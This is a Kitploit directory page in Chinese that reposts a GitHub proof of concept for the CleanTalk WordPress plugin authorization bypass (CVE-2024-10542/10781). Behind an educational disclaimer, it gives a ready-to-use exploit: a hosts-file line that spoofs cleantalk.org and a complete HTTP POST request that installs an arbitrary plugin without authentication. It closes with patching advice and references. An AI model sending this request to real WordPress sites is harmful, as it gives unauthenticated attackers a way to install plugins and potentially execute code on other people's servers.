Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-10542 — WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 存在未认证的任意插件安装漏洞 | Kitploit
工具/GitHubGitHub/ubaydev/cve-2024-10542
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证学习与教育
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk Plugin <= 6.43.2 存在未认证的任意插件安装漏洞

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-10542 和 CVE-2024-10781 的 PoC:CleanTalk 插件(版本 <= 6.43.2)中的认证绕过漏洞

免责声明:

本文档中关于 CVE-2024-10542 的信息仅供学习和教育目的。我们不鼓励或授权将此信息用于任何有害目的,包括但不限于漏洞利用、系统篡改或其他非法活动。

简介:

在日益复杂的数字环境中,确保网站安全对许多站点所有者至关重要。最近,发现两个严重漏洞,对 WordPress 站点构成重大威胁。这些漏洞影响知名的 CleanTalk 插件,该插件提供垃圾邮件防护、反垃圾邮件功能和防火墙。情况为何更加紧迫?让我们深入探讨! 跟踪为 CVE-2024-10542 和 CVE-2024-10781 的两个漏洞可能允许未经身份验证的攻击者在受影响站点上安装并激活恶意插件。这不仅危及站点的声誉,还为攻击者执行远程代码敞开了大门。CVSS 评分为 9.8(满分 10 分),显然这些漏洞属于高度危险类别。根据 Wordfence 的说法,这两个漏洞都涉及授权绕过问题,可能允许恶意行为者安装和激活任意插件。如果激活的插件本身存在漏洞,这可能进一步导致远程代码执行。

PoC:

首先,恶意用户将在其操作系统上设置 hosts 文件:

root@kitploit:~
127.0.0.1 cleantalk.org

随后,他们发送如下请求:

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

结论:

网络安全是每个站点所有者共同的责任。通过保持插件更新并对潜在漏洞保持警惕,我们可以保护站点免受恶意攻击。请确保已将 CleanTalk 更新至最新版本,并定期检查其他插件以确保最大安全性。记住,小步骤可以防止大灾难!

参考:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

请我喝杯咖啡:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

致谢:

真主,穆罕默德(愿主福安之),mikemyers,Markdown Monster,我的家人,还有你?

下载工具